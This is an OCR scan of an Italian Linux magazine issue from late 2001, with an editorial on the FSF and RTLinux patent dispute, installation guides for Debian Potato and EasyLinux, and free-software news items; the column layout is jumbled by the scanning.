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1 14 Settembre 2001, mentre 

ancora tutto il "nostro" mondo 

era alle prese con qualche 

non indifferente dubbio sulla 

natura stessa della sicurezza 
della nostra società, qualcun altro 
aveva qualcos'altro da fare. 


A Boston nel Massachusetts, infatti, 
un gruppetto di persone facenti 
capo alla Free Software Foundation 
era alle prese con l'invio di un 
esposto alla magistratura 
americana per la presunta 
violazione della GNU General Public 
License (GPL) contro la persona di 
Victor Yodaiken, amministratore 
della FSMLabs, distributore di 
RTLinux, reo (confesso) di aver 
presentato richiesta di brevetto su 
una componente aggiuntiva per la 
trasformazione del kernel Linux in 
i un sistema "hard real time" di sua 
propria invenzione. 


Il tentativo di Yodaiken era, nella 


pagamento di opportune royalties, 
pur rendendole pubbliche, 
vanificando in parte il dettato della 
licenza di distribuzione pubblica 
GPL, eppur giovandosi delle 
distribuzione libera di Linux. 


Un intento tanto lodevole, quello 
della FSF. quanto inutile, come essi 
stessi affermano. Infatti non 
essendo loro i possessori del 
copyright di Linux, che resta ancora 
saldamente nelle mani di Linus 
Torvalds, non hanno alcun titolo a 
richiederne la tutela giudiziaria. 


Una non-notizia, quindi. Da un lato 


sostanza, quello di impedire ad altri 
l'uso delle sue aggiunte senza il 
c'è una persona che in tutta 


"onestà" rivendica a sé un diritto, 
almeno stante l'attuale legislazione 
sui brevetti (che non dimentichiamo 
hanno permesso ad un ingegnere 
australiano pieno di tanto senso 
dello humor di brevettare un 
"dispositivo rotondo atto al trasporto 
di cose e persone" ovvero la ruota), 
dall'altro lato una associazione alla 
ricerca solo di una legittimazione 
estrema quale paladina di una 
visione invero un po' radicale di 
libertà nel software. Una 
legittimazione che attraverso il 
proprio codice prodotto non ha 
ancora trovato. 


| sostenitori della Free Software 
Foundation tendono a vedere il 
mondo del software in modo 
ingiustamente polarizzato in 
programmi sottoposti alla GPL e 
tutto il resto, indipendentemente se 


siano solo un po' meno "liberi" o 
non lo siano per nulla. Affrontando 
il discorso in modo invero un po' 
fanatico. 

Ovviamente il mondo reale è molto 
diverso e la gran quantità di licenze 
di distribuzione diverse dalla GPL 


IN CASA NOSTRA UN PO DI 


rappresenta essenzialmente la 
necessità degli autori di sentire 
tutelato il proprio lavoro. E senza 
questo lavoro, anche in presenza di 
tutte le GPL del mondo, non esiste 
alcuna libertà perchè non esiste 
software. E questo, Stallman e i 
suoi adepti, lo sanno benissimo 
perchè loro non sono riusciti a fare, 
per dieci anni. quello che Torvalds 
ha fatto in una estate (con una 
licenza allora molto lontana dalla 
GPL): rivoluzionare l'informatica. 
Non basta metterci sopra il cappello 
con il nome, nè proporsi come Don 
Chischiotte pronto a combattere per 


ordine (e legge) 


i diritti altrui (anche quando non li 
rivendica). 
Ma questo giustifica Yodaiken? 
Forse no, ma solo perchè imporre 
un brevetto ha un effetto così 
negativo sull'innovazione 
tecnologica. 
Ma allo stesso tempo non giustifica 
la ricercata litigiosità guerrafondaia 
della FSF soprattutto quando Linus 
continua a ripetere: Just for Fun! 
Solo per Divertirsi! 
Emmanuele Somma 
<esomma@ieee.org> 
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‘ Installare 
la Debian 


Affrontare l'installazione della Debian ha la fama di essere una questione 
intricata anche solo a cominciare dal nome: Slink. Potato. Woody. 


n realtà sembra di stare 

al cinema a vedere "Toy 

Story" e invece si hanno 

solo di fronte le varie 
versioni delle distribuzioni 
Debian. Nonostante que- 
sto, se si è "solo un uten- 
te", sia che si voglia espel- 
lere l'odiato sistema opera- 
tivo del nemico provenien- 
te da Mung, o che si voglia 
solo coesistere con esso la 
scelta migliore è l'ultima 
versione stabile, chiamata 
comunemente Potato 
(ovvero Patata, strano 
vero?). 


Cosa Fare... 


Se è vero che praticamente 
tutte le altre distribuzioni 
hanno, rispetto alla 
Debian, il grande (e forse 
unico) pregio di essere più 
facilmente installabili, la 
procedura che può portare 
la Patata sul vostro compu- 
ter si è notevolmente sem- 


plificata nel tempo. 
Capiamoci: non sarà una 
procedura semplice. 
Potrebbe non essere indo- 
lore. In qualche cosa è 
pure pericolosa, per la 
salute dei dati presenti sul 
vostro computer e per i 
vostri nervi. Quanto al 
primo problema preoccu- 
patevi di fare un backup 
completo dei dati eventual- 
mente presenti sul vostro 
disco e siate certi di poter 
reinstallare eventualmente 
il sistema operativo che 
già avete e tutte le sue 
applicazioni. Non voglio 
impaurire il lettore, può 
darsi che non accadrà pro- 
prio nulla di male, ma... 
meglio prevenire che cura- 
re. Quanto ai nervi consi- 
glio un bel corso di zen. 
Aiuta. 

In questo articolo vedremo 
come mettere su una mac- 
china dual-boot 
Linux/Windows che possa 


permettervi, scegliendolo 
al boot di lavorare con uno 
o l'altro sistema operativo. 
Ecco cosa faremo: 


1. Documentare il proprio 
sistema. 


2. Preparare l'hard disk. 


3. Installare il Sistema di 
Base. 


4. Selezionare ed installa- 
re i package. 


5. Configurare in sistema. 
6. Fare un upgrade. 


L'installazione di Debian 
può avvenire direttamente 
dai floppy disk per i com- 
puter che non hanno a 
disposizione nè un CD- 
Rom nè una connessione 
di rete. Non è una cosa 
meravigliosa, ma si può 
fare. Così come è possibile 
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(1° parte) 


installarlo in vecchi 386 
con 4 Mb e senza dischi 
fissi. A prezzo di imparare 
a pregare in aramaico ed 
avere una gran quantità di 
imprecazioni in gran parte 
delle lingue conosciute. 
Non è il massimo della 
vita, ma si può fare. Ciò 
nonostante in questo arti- 
colo faremo conto che si 
abbia a disposizione un 
computer "decente", alme- 
no un Pentium 75 con una 
adeguata disponibilità di 
RAM (32 Mega), un CD- 
Rom e un disco IDE di una 
dimensione sufficiente a 
mantenerci comodamente 
il vostro Linux e l'anticorpo 
di Mung. Quindi non elimi- 
neremo Windows per darci 
modo di migrare con 
calma le applicazioni e le 
configurazioni da Windows 
a Linux. Una configurazio- 
ne che comunemente 
viene detta Dual Boot. 
Ultima avvertenza prima di 
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La] 


iniziare. Nessuna procedu- 
ra di installazione scritta da 
nessuna parte, per quanto 
precisa ed accurata possa 
essere, può coprire ogni 
possibile situazione. A 
dispetto della ventilata 
standardizzazione dei PC, 
quello che si trova all'inter- 
no di un computer è così 
vario e strano che nessuno 
può predire ogni possibile 
interazione tra tanti com- 
ponenti differenti ed etero- 
genei. Quindi anche nel 
seguire queste note... 

... E' NECESSARIO 
USARE LA TESTA. 

Il lato positivo è che non si 
è mai da soli. Basterà fre- 
quentare i newsgroups o i 
canali IRC dedicati a Linux 
per ottenere ogni risposta 
ai propri dubbi, e anche di 
più. La comunità Debian è 
sempre ben disposta a 
seguirvi passo passo, se si 
esclude qualche cretino 
esaltato che dietro il tono 
saccente e arrogante 
nasconde solo la propria 
incapacità di risolvervi un 
problema. 


Documentare 
Il tuo sistema 


L'acquisizione automatica 
della configurazione del 
proprio computer in fase di 
prima installazione è una 
di quelle cose in cui oggi 
Linux eccelle. A volte però 
anche Linux ha bisogno di 
aiuto. Non bisogna dimen- 
ticare che a differenza di 
altri sistemi operativi dove 
i produttori di hardware 
forniscono direttamente i 
propri uriver, e la procedu- 
ra d'installazione è scher- 
zosamente denominata 
Plug and Pray (ovvero 


Dicembre 2001/Gennaio 2002 


aggancia e prega), in Linux 
i driver sono costruiti spes- 
so dagli stessi utenti e non 
sono necessari le frequenti 
riconfigurazioni e i relativi 
reboot. Occasionalmente 
anche in Linux è necessa- 
rio dare una mano al mec- 


canismo di autoconfigura- 
zione. Va da sé che qualora 
questo sistema non funzio- 
nasse il dispositivo in que- 
stione non sarebbe visibile 
da Linux: passi per una 
periferica secondaria, ma 
se si tratta di un pezzo 


2940UW sull'ID 7). 


Hard Disk 


RAM 


CDROM 


canale). 


Adattatore di Rete 


Realtek 8029). 


Mouse 


Adattatore Video 


Intel i810e 4Mb vRam). 


Monitor 


Modem 


Robotics V90 su COMT1). 


DISPOSITIVI 


Adattatore del sottosistema a Dischi 
IDE o SCSI, e nel caso di quest'ultimo chipset del control- 
ler (ad es. Controller IDE + Controller SCSI Adaptech 


Numero, dimensione e tipo di ogni hard disk presente nel 
sistema, posizione all'interno del bus IDE o nella catena 
SCSI (ad es. HD IDE Maxtor 51536H2, CHS=1860/255/63 in 
posizione 0 del primo canale IDE + HD SCSI IBM 
CAS51536H2, CHS=3096/255/63 sull'ID 0). 


Dimensione della RAM (64Mb). 


Drive Posizione sul bus IDE o nella catena SCSI (ad es. 
ATAPI 48X CD-ROM drive in posizione 0 del secondo 


Marca e Modello della scheda o chipset supportato (ad es. 


Tipo (PS/2 con il connettore tondo, USB con il connettore 
piatto, seriale con il connettore a vaschetta o su bus con- 
nettore tondo diverso da quello della tastiera) e Protocollo 
supportato (Microsoft, Logitech, MouseMan, ecc.). Se è 
seriale la porta a cui è connesso. (ad es. PS/2). 


Marca e Modello. Quantità di video RAM. (ad es. Chipset 


Marca e Modello. Profondità massima di colore. 
Frequenze orizzontali e verticali di refresh (as es. NEC 
A700+ H29.00- 70.00kHz, V40.00- 90.00Hz). 


Se esterno la porta a cui è connesso. (ad es. USR 


principale come il sottosi- 
stema dei dischi o la sche- 
da grafica? Come fare? La 
prima cosa cui partire sono 
senza dubbio le informa- 
zioni sul proprio hardware 
che è possibile recuperare 
in giro. | produttori di PC 
(anche quelli di marca) non 
ci aiutano moltissimo poi- 
ché quasi mai forniscono 
una scheda che riporta con 
precisione l'insieme dei 
componenti e le loro carat- 
teristiche. Dovremo quindi 
farlo autonomamente recu- 
perando tutte le possibili 
informazioni sui dispositivi 
elencati nella tabella di 
fianco. Se non si hanno a 
disposizione i manuali dei 
singoli pezzi presenti all'in- 
terno del proprio sistema 
da cui trarre queste infor- 
mazioni è possibile usare 
Windows per acquisire una 
parte di queste informazio- 
ni. Usando il programma 
“Sistema” nel "Pannello di 
Controllo" (Start/Configura- 
zioni/Pannello di Controllo/ 
Sistema) è possibile avere 
accesso alle configurazioni 
delle periferiche presenti 
nel sistema e nell'apposita 
finestra della gestione dei 
dispositivi avere a disposi- 
zione ulteriori informazioni 
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Figura 1 


Per acquisire informazioni 
sull'hardware del sistema è 
possibile usare il programma 
"Sistema" nel "Pannello di 
Controllo” di Windows. 


(vedi Figura 1). Tutto 
andrebbe trascritto accura- 
tamente: è un interessante 
esercizio che potrebbe sal- 
varci dal panico in un suc- 
cessivo momento. 


Preparare 
l'Hard Disk 


L'amore incondizionato 
che molti fan del pinguino 
portano per Bill Gates è 
dovuto alle sue mitiche 
intuizioni espresse in intra- 
montabili massime del- 
l'informatica come ad 
esempio: "640 kilobyte di 
RAM saranno abbastanza 
per chiunque", "Internet 
non serve a nulla" e "un 
hard disk di 2 Gb è sempli- 
cemente troppo grande 
per ogni utente". Così per 
aggiungere più di 640 Kb 
di RAM ad un sistema DOS 
è stato necessario inven- 
tarsi metodi da cui si può 
certamente desumere la 
natura maligna del genere 
umano, per connettersi 
con un minimo di sicurezza 
in Internet con Windows è 
necessario aprire un 
mutuo in banca e per 
avere un disco con 
Windows 95 più grande di 
2 Gb, be'... semplicemente 
è impossibile, il sistema 
operativo proprio non lo 
vede. Quest'ultima cosa ha 
prodotto una consuetudine 
che tuttora sopravvive: for- 
mattare i dischi rigidi in un 
certo numero di partizioni 
(all'inizio non più grandi di 
2 Gb), anche quando con 
Windows 98 SR2 questa 
limitazione è stata elimina- 
ta. Se anche il sistema in 
esame è in questa comoda 
situazione di avere un 
certo numero di partizioni 
separate va seriamente 


valutata l'opportunità di 
riservare un'intera partizio- 
ne a Linux, liberandola 
completamente dai dati 
Windows. Qualora invece 
si trovi nella non invidiabi- 
le situazione di prevedere 
una sola partizione per l'in- 
tero disco allora andranno 
fatti dei passi ulteriori per 
ricondurre il disco in una 
condizione adatta all'instal- 
lazione di Linux. Come 
quindi ridurre una partizio- 
ne? La teoria è abbastanza 
semplice: 


1. Deframmentare l'hard 
disk cercando di far 
spostare al programma 
di deframmentazione 
tutti i dati all'inizio del 
disco; 


2. Ridimensionare la parti- 
zione esistente in modo 
da tagliar fuori la sezio- 
ne di cui si ha bisogno 
per Linux; 


3. Aggiungere una (o più) 
nuove partizioni nello 
spazio che si è così 
liberato. 


In teoria è abbastanza faci- 
le. Ma in pratica? Esistono 
alcuni modi diversi per 
fare questa operazione. 
Quello consigliato da 
Debian prevede l'uso di 
GNU Parted ed è il seguen- 
te: 


1. Creare un dischetto di 
boot linux contenente 
un sistema minimo 
necessario praticamen- 
te solo a permettere la 
partenza di GNU 
Parted; 


2. Rifare il boot del com- 
puter con questo 
floppy; 


3. Usare Parted per ridur- 
re la partizione; 


4. Rifare il boot con il CD- 
Rom di installazione 
della Debian. 


Ovviamente PRIMA va 
fatta la deframmentazione 
sotto Windows. Per questo 
si può usare il programma 
Microsoft (Avvia/ Program- 
mi/Accessori/Utilità di 
Sistema/Utilità Disco), 
oppure il migliore pro- 
gramma presente nelle 
Norton Utilities. Creare un 
floppy di boot per Parted è 
estremamente semplice. 
Bisogna procurarsi l'imma- 
gine del disco, che è un file 
.img che solitamente risie- 
de all'indirizzo 
http://www.gnu.org/softwa- 
re/parted e il programma 
RAVWVRITE che è sul CD 
Debian o in internet a 
ftp.debian.org/debian/tools/. 
Basterà lanciare RAWRITE 
e indicargli il nome del file 
da scrivere sul disco (Ad 
esempio C:\Windows\ 
Desktop\parted.img"). 
Inserire un disco vuoto e 
formattato e attendere il 
termine. Poi fare il reboot 
con il disco inserito. 


Usare Parted 


Alla ripartenza con il 
floppy inserito è possibile 
vedere, per chi non l'ha 
mai visto prima, il boot- 
strap di Linux: una gran 
quantità di messaggi su 
uno schermo nero ripor- 
tanti per lo più linee di 
copyright o configurazioni 
di sistema. Alla fine c'è un 
prompt simile a quello del 
DOS (ma non è DOS): è la 
shell Linux. Sarà sufficien- 


DEBIAN 


te scrivere ‘parted DEVICE' 
per lanciare il programma 
dove DEVICE è il nome del 
disco che vogliamo tagliuz- 
zare. Ovviamente DEVICE 
non è qualcosa di così 
semplice come C: o D: 
come ci saremmo attesi in 
DOS, ma qualcosa di un 
pochino più complicato. La 
prima parte del nome è 
sempre ‘“/dev/" seguita da 
una stringa che può essere 
"hd" se il disco è IDE o “sd” 
se è SCSI, seguito infine 
da una lettera minuscola in 
ordine alfabetico. Ad 
esempio ‘dev/hda" è il 
primo disco sul bus ide. 
L'aggiunta di una ulteriore 
cifra indica la partizione 
all'interno del disco, così 
"/dev/sdb4" è la quarta par- 
tizione del secondo disco 
sulla catena SCSI. Quindi 
per ridurre il primo disco il 
comando è '‘parted 
/dev/hda'. Comparirà il 
prompt del programma: 


(parted) 


Se si volesse, ad esempio, 
ridurre (resize) la prima 
partizione (1) a 4 Giga (0 
4000) il comando sarebbe: 


(parted) resize 1 0 4000 


Ecco tutto. E' probabile che 
escano fuori dei messaggi 
di warning. Per lo più sono 
dovuti alla discrepanza su 
come Linux e Windows 
misurano lo spazio fisico 
nel disco o sul fatto che sia 
necessario spostare i file di 
sistema di Windows. 
L'esperienza mostra che 
trascurarli non conduce a 
gravi danni. Fare un reboot 
in Windows e il sistema 
dovrebbe avere il disco più 
piccolo. 

continua... 


0eo 
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FasyLinux 2.4 


Procedura d'installazione in tredici semplici passi l'installazione 
e la connessione in Internet. 


bbiamo scelto 

EasyLinux per- 

chè è probabil- 

mente la più 
semplice distribuzione 
che esiste in circolazione. 
Ecco in tredici semplici 
passi tutto quello che c'è 
da sapere per installarla e 
configurarla per la con- 
nessione ad internet. Ciò 
nonostante leggi tutto 
questo articolo prima di 
iniziare. 


Passo 0: Ne parliamo 
dopo. 


Passo 1: Scelta della 
Lingua. C'è veramente 
poco da dire: scegli 
Italiano e vai oltre. 


® Please select your desired language 


Czech 
a = Danish 
SE English(UK) 
Si English(USA) 
B 0 French 


fi ll French(cH) 


oo 
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f eMouse V2.2 


{- Testina area 


Mouse type 


(© PS/2 mouse 
©. PS/2 wheel mouse 


€. Serial mouse 
©. Bus mouse 


Interface 


Protocol: [ PS/2 (all PS/2 mice) “] 


Device: 


[jdew/psaux “] 


d) 


piva eee” i 


Number of buttons: IE 3 


Baud rate: 


[1200 “] 


N Emulate third button 
[IT Enable chord middle 


__o& |[_aoo ]gs os | 


Figura 2 


Passo 2: Scelta del tipo 
di Mouse. Scegli come 
tipo Mouse PS/2 se il tuo 
connettore ha la forma di 
quello riportato in alto a 
sinistra. Usa "Apply" e 
prova il mouse nell'appo- 
sita area controllando che 
i tre pulsanti funzionino 
correttamente (se ne hai 


due è possibile emulare il 
terzo premendoli ambe- 
due contemporaneamen- 
te, ma dovrai selezionare 
l'opzione "Emulate third 
button"). 


Passo 3: Selezione della 
Tastiera, del Controller del 
Disco e del CD-ROM. 


eConfirm V2.0 


SL sas harovare components 
7 Keyboard -— — - 
- Il 
Model: ‘(pc104 DI 
ni | 
| Language: (i I 


| Testi: Change KBD | 


| 


Disk controller 


Figura 3 


Le scelte di default sono 
presumibilmente le più 
adatte, a meno che tu non 
abbia altre informazioni 
particolari sul tuo hadrwa- 
re. 


Passo 4: Selezione del 


eChoice V22: Ins tdler 
Pleaso give mo a hint about your Linux knowledge 


“4 | Novice: click on inis icon, if its your 
DA | test omo instatig Linux 

2 | Bgerienced: you know whal is X, Lilo, 
bal KDE, a WM, NFS, and 


things liko that. 
(Recommended If you want to install a LAN Cllen) 


ProfeSsional Installation: show me avi 
(Also needed for a LAN server Instaltation) 


Pack 


Figura 4 


Livello. Scegli Novice. E 
così sia. 


Passo 5: Partizionamento 
del disco. Nello spazio 
libero sul disco crea una 
partizione ext2 con la 
directory "/" come mount 
point, crea inoltre una 
partizione di swap della 
dimensione del doppia 
della RAM con un massi- 
mo di 128 Mb (eventual- 
mente puoi creare più di 
una partizione di swap), 
inoltre ti conviene creare 
una ulteriore partizione 
ext2 con la directory 
"l'home" come mount- 
point. Questo ti permet- 
terà eventualmente di 
reinstallare qualche altra 
distribuzione ma salvare i 
tuoi dati personali. 


f eFdisk V2.1 for begjinner 


Harddisks: 


Please mark the partitions you want to use for 
BasyLinux. All data on these partitions will be lost! 


9 /dev/hdal 63 Linux native 1998.28 


Install as 


You have Intemet access. 


Your PC has NO Internet connection. 


- Special installation 


& TT Laptop installation Checkthis, if you want to install on a laptop. 


Figura 5 


Passo 6: /mpostazione 
della Data. La cosa miglio- 
re è che definire il clock in 
CMOS come UTC. Scegli 
successivamente la 
Timezone (Europa/Roma) 
e, se necessario, imposta- 
re l'orario di sistema. 


Passo 7: /nstallazione 
File. Attendere l'installa- 


zione dei file sul disco. 


Passo 8: LI/LO. Installare 


LILO sull'MBR. 


Passo 9: Reboot 
Finalmente il reboot. 
Estrai il CD-Rom dal letto- 
re e attendi il reboot. 


Passo 10: Scelta della 
password di root. Fare il 
login come utente root, 
senza password. La prima 
operazione che viene pro- 
posta è l'inserimento di 
una nuova password per 


root. Inserirla ma scriverla 
da qualche parte. Perderla 
è un vero problema. 


NIDI 24 


TÀ rese va inning ne pace stem now 
CITITTI I i 27% 


Figura 8 


Passo 11: Aggiunta di un 
nuovo utente. E' il 
momento di aggiungere 
un nuove utente a basso 
privilegio per lavorare 
senza usare l'utente root. 


Passo 12: Completamen- 
to del Profilo. Aprire il 
programma eProfile e 
selezionare i gruppi di 
programmi chi interessa- 
no, ad esempio 
internet/multimedia/ cdre- 
cording ecc. Fare un giro 
tra le applicazioni scelte 
per selezionarne o desele- 
zionarne eventuali altre e 


= UTC- setting 


@ CMOS clock is set to universal time (UTC) 


© CMOS clock is set to local time $ 


_ Zoneinfo 


Timezone: | Europe/Rome “] (9 


Local time: 12:19:56 


Hardware (CMOS) time: | 12:19:55 


Universal time (UTC): î d:19:56 


 CMOS clock 


MW change system time (affects CMOS) 
Date MUBDNWYV): fo S|7 Son 
Time 24h a MM:SS): q 4. o 4. a al 


Store in CMOS | 


Figura 7_— 


0000 
0000 
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Li nou 


FASYLINUX 2.4 


eLilo V2.3 
LILO destination - 


. Where to install LILO [ Master boot record (MBR) “] 
Disk or partition [ /dev/hnda “] 


Global kernel append line [auto = 


Global options 


Ju activate pantition 
| I° linear disk access 
MW allow LILO to access boot 


images above the 1024 cylinder 


boundary (lba32) 
Wait before booting Ester loc. |< 


Figura 9 


infine si faccia procedere 
il processo usando la 
quarta icona in alto 
(RUN). L'installazione del 
sistema sarà completata 
in meno di cinque minuti, 
e non c'è bisogno di alcun 
reset 


Passo 13: Configuriamo 
Internet. Per configurare 
Internet cliccare sull'Icona 
Internet. Accendere e col- 
legare il modem. Nella 
finestra di configurazione 
di KWvDial, scegliere il 
menu File/Configurazione, 
avviare la ricerca del 
modem. Successivamente 
si aprirà la finestra di con- 
figurazione fare le scelte 
opportune, ad esempio è 
spesso utile selezionare 


Reboot 


fi ) Please remove the CD-Rom after the 
computer has restaried again, if you 
booted easyLinux directiy from CD. 


If you did not install LILO on a 
floppy disk then remove the floppy 


GRRERe Veni o a Sonia 2450n 
will now boot 


As soon as the login screen appears 
after the reboot, enter root’ in the 
login field and simply press retumi 


‘Current mulo ey 


New _ Newenty | _ Newenty | 


— Change entry | entry 
Delete entry | 


"No wait for dialtone" e 
"Emulate Win95/98". 
Inserire il numero di 
telefono del provider, l'u- 
tente e la relativa pas- 
sword. 


Cos'è rimasto 
indietro? 


Il passo 0 è l'unico vero 
passo problematico del 
processo di installazione. 
Di che si tratta? Di trovare 
lo spazio sul disco per 
installare Linux. Come si 
fa? La prima opzione, la 
più semplice, è aggiunge- 
re o farsi aggiungere dal 
proprio rivenditore di 
fiducia un hard disk 
nuovo e non formattato. A 
questo punto si avrà a 
disposizione spazio libero 
nel nuovo disco (di solito 
hdb). La seconda opzione, 
la più complessa, è quella 
di ripartizionare il disco 
già presente. In questo 
caso è necessario seguire 
con estrema attenzione le 
seguenti istruzioni: 


*. Deframmentare da 


Figura 12__ 


Figura "i 


Windows l'hard disk 


che intendete ridurre 
disattivando tutti i pro- 
grammi che potrebbe- 


ro usare il disco in 
modo non comune 
(tipo le utility di 


Norton, gli Antivirus e 
quanto altro). La cosa 
migliore sarebbe ese- 
guire queste operazio- 
ni in modalità provvi- 


soria di Windows. 


Usare il programma 
FIPS per ridurre il 


disco selezionando la 
dimensione da desti- 


nare a Linux 


A questo punto è possibi- 
le procedere oltre con le 
istruzioni che ti 

abbiamo dato. 


Conclusioni 


La procedura 
d'installazione di Easy- 
Linux è particolarmente 
semplificata e presenta 
qualche problema solo 
nell'operazione di 
partizionamento 
dell'hard disk. 


N E WS 


A lezione di giurisprudenza libera 


Il creatore della GPL spiega come mai le dispute legali relative al software libero siano così rare 


ensare agli aspetti ideologici della 

Free Software Foundation (FSF) e 

a quelli legali coperti dalla 
General Public License (GPL) porta qua- 
si automaticamente alla mente l'imma- 
gine di Richard M. Stallman, creatore 
della fondazione e primo ideatore della 
licenza. Ma dietro la creazione della 
GPL si nasconde, ovviamente, anche 
una mente con una formazione legale, 
quella di Eben Moglen, professore di di- 
ritto alla Columbia University e consu- 
lente a titolo gratuito della FSF. Un re- 
cente articolo di Moglen risponde ai 
dubbi sulla reale efficacia legale della 
GPL: è possibile ricorrere in giudizio 
contro violazioni della GPL? Ogni anno, 
spiega Moglen, i casi di questo tipo si 


NUOVI VIRUS, 


contano a decine, ma raramente si arri- 
va in tribunale perché le società respon- 
sabili sono interessate soprattutto a una 
rapida conciliazione, e la FSF è interes- 
sata esclusivamente alla regolarizzazio- 
ne delle licenze, e non a rimborsi finan- 
ziari o alla pubblicizzazione dei fatti. 
Con tutti i dubbi che sono stati espressi 
sull'efficacia della GPL, conclude 
Moglen, sarebbe vantaggioso un caso 
legale che la dimostrasse una volta per 
tutte, ma ben difficilmente qualche so- 
cietà sarà disposta a rischiare la reputa- 
zione in una causa persa in partenza. 


Per maggiori informazioni: 
www.gnu.org/philosophy/enforcing- 
gpl.html moglen.law.columbia.edu 


GARTNER GROUP TRADISCE MICROSOFT 


Dopo l'impatto di Code Red e Nimda, persino la principale sostenitrice di Microsoft 
tra le società di analisi tecnologica deve cambiare rotta. 


li ultimi virus hanno lasciato il 

segno. Dopo che gli attacchi ai ser- 

ver Web basati su IIS si sono con- 
tati a milioni, Gartner Group ha dovuto rac- 
comandare alle “società colpite sia da Code 
Red che da Nimda” di “investigare imme- 
diatamente e cercare alternative a IIS, com- 
presa la migrazione delle applicazioni Web 
ad altri produttori (sic) come iPlanet e 
Apache”. Per una società come la Gartner, 
che non ha mai mostrato particolare simpa- 
tia verso il software libero e open source, 
indicare Apache come alternativa consiglia- 
bile a un prodotto Microsoft costituisce un 
passo molto significativo. Normalmente si 
sostiene che uno dei motivi principali della 
forte resistenza degli ambienti basati su 
Linux ai virus è la loro relativa piccola diffu- 
sione, che li rende poco interessanti per gli 
scrittori di virus. In questo caso Nimda 
attacca anche i server Web e volge la sua 


attenzione ad IIS anziché al più diffuso 
Apache, per cui sembra ragionevole conclu- 
dere che ad attrarre gli attacchi sia soprat- 
tutto la ricchezza di bachi di IIS. 


Per maggiori informazioni: 
www.gartner.com/DisplayDocument? 
doc_cd=101034 


METCRAFT Secure Server Survey &@q@ , 


49, Rea 


he Netoraît Web Server Survey is asurvey of Web Server software usage on Internet connected computers. We collect and collate as many hostnames 
providing an http service as we can find, and systematicaliy poll esch one with an HTTP request for the server name. 
[n the September 2001 survey we received responses from 32,398,046 sites. 


Market Share for Top Servers Across All Domains August 1995 - September 2001 
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Premi Takeda a Sakamura, Stallman 


e Torvalds 


| 


basati sul software libero. 


| a Fondazione Takeda di Tokyo ha 
| annunciato i vincitori della prima 
edizione dei “Takeda Awards”. 

Questo nuovo premio viene conferito 

annualmente a individui che abbiano 

| sviluppato nuove tecniche ingegneristi- 

| che volte a favorire il benessere dell'u- 

| manità. | premi sono conferiti nell'am- 
bito di tre settori: benessere socio-eco- 
nomico, benessere dell'individuo o del- 
l'umanità, benessere ambientale. A cia- 
scuno dei tre premi è associato un va- 

| lore monetario di cento milioni di Yen, 

approssimativamente 915'000 Euro 

| (quasi un miliardo e ottocento milioni 

| di vecchie lire). La Fondazione ha rico- 
nosciuto il valore socio-economico del 
software libero, conferendo il premio 
per “La creazione e lo sviluppo di mo- 
delli di sviluppo aperti per il software 
di sistema - architetture aperte, softwa- 
re libero e software open source”. Il 
premio è stato conferito congiunta- 
mente a Ken Sakamura, Richard M. 
Stallman e Linus Torvalds, rispet- 
tivamente per l'architettura aperta 


| 
| 
| 

da terrorismo 


| | attentato terroristico dello scorso 
11 settembre a New York e 
| Washington ha portato a un nuovo 
assalto del fronte statunitense anti- 
crittografia. La libera disponibilità di 
| software crittografico “forte”, viene 
sostenuto, ha senz'altro giocato un ruolo 
importante nell'organizzazione dei 
terroristi, per cui stabilire forti limiti 
sull'utilizzo di software cifranti porterebbe 
indubbi benefici alla prevenzione di atti 
criminali analoghi. Numerosi esperti di 
sicurezza hanno indicato con chiarezza che 
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CURRICULUM VITAE 


Social/Economic 
Welk-Being 


Il nuovo, prestigioso nonché consistente premio attribuito per la creazione di sistemi 


Ken Sckamura 
| 1979 Ph.D. Keio University 
| 1984 started TRON project 
| present, Professor of University of Tokyo 


Richerd M. Stallman m 

1971 MIT AI laboratory 

1984 resigned from MIT and started GNU project 
1985 founded Free Software Foundation (FSF) 


What i the Takeda Anand 
Ain to Achieve 


present, President of FSF 


Linus Torvalds m 


World Environmental Wed-Being 


1988 Helsinki University 


1991 developed Linux while in Helsinki University 
present, working at Transmeta Corporation 


TRON per sistemi real-time, per l'avvio 
del movimento del software libero e lo 
sviluppo di GNU, e per il kernel di 
Linux. La Fondazione Takeda è nata 
nell'aprile del 2001 con l'obiettivo di 
premiare e stimolare quella che viene 
chiamata tecno-imprenditoria. | premi 


è estremamente improbabile che misure di 
questo tipo abbiano un qualche effetto sulle 
organizzazioni terroristiche: non ci sono 
indicazioni reali che i terroristi utilizzino la 
crittografia piuttosto che tecniche più 
tradizionali o meno controllabili, come la 
steganografia; l'efficacia di una limitazione 
legale nei confronti di gruppi di questo tipo 
è comunque dubbia; l'impatto maggiore 
sarebbe invece subito dalle organizzazioni 
che beneficiano della crittografia per altri 
motivi (commercio elettronico, banche, 
eccetera); infine, le tecniche di “key escrow” 


verranno conferiti nel corso di una ceri- 
monia che si terrà a Tokyo il 4 dicem- 
bre prossimo. 


Per maggiori informazioni: 
www.takeda-foundation.jp/e/award/ana/ 
index.html 


CRITTOGRAFIA USA, PRONTO UN NUOVO BLOCCO 


In USA, i falchi del controllo a tappeto delle comunicazioni colgono l'onda della paranoia 


proposte in alternativa sono di difficile 
realizzazione, e di applicabilità molto più 
limitata. Ricordiamo che l'esportazione di 
software di crittografia dagli Stati Uniti è 
ancora soggetta a controlli, sebbene molto 
più limitati che in passato, mentre nella 
maggior parte dei paesi dell'Unione Europea 
la distribuzione di software di questo tipo 
non è soggetto a restrizioni. 


Per maggiori informazioni: 
www.counterpane.com/crypto-gram- 
0109a.html 


N E WS 
a 
P G n 
USA, una nuova legge anti-Linux? 
5 m 
La nuova proposta rischia di bloccare completamente la diffusione di sistemi 
operativi liberi. 
| 
| famigerato “Digital Millenium te che aderiscano agli standard sta legge, Linux e il software libe- | 
Copyright Act'' (DMCA) statuni- per i sistemi di sicurezza adottati ro potrebbero diventare illegali | 
tense, base legale dell'arresto di nella sezione 104”. Lo scopo appa- nella nazione dove opera il mag- | 
Dmitry Sklyarov, impallidisce da- re sempre quello di impedire la gior numero di sviluppatori. Per | 
vanti al successivo progetto di leg- copia di musica, filmati e altri pro- quanto remota possa apparire | 
.ge statunitense, denominato dotti artistici protetti da diritto questa possibilità, va ricordato che 
“Security System Standards and d'autore, ma la legge finisce con il gli Stati Uniti si sono già posti in 
Certification Act” (SSSCA). La pro- coprire qualunque dispositivo digi- prima linea sul fronte delle leggi | 
posta di legge esordisce con l'af- tale. di controllo delle tecnologie digita- | 
fermazione che in generale “è ille- La stessa natura dei sistemi opera- li con l'approvazione della DMCA. | 
gale produrre, importare, offrire al tivi liberi, siano essi basati su 
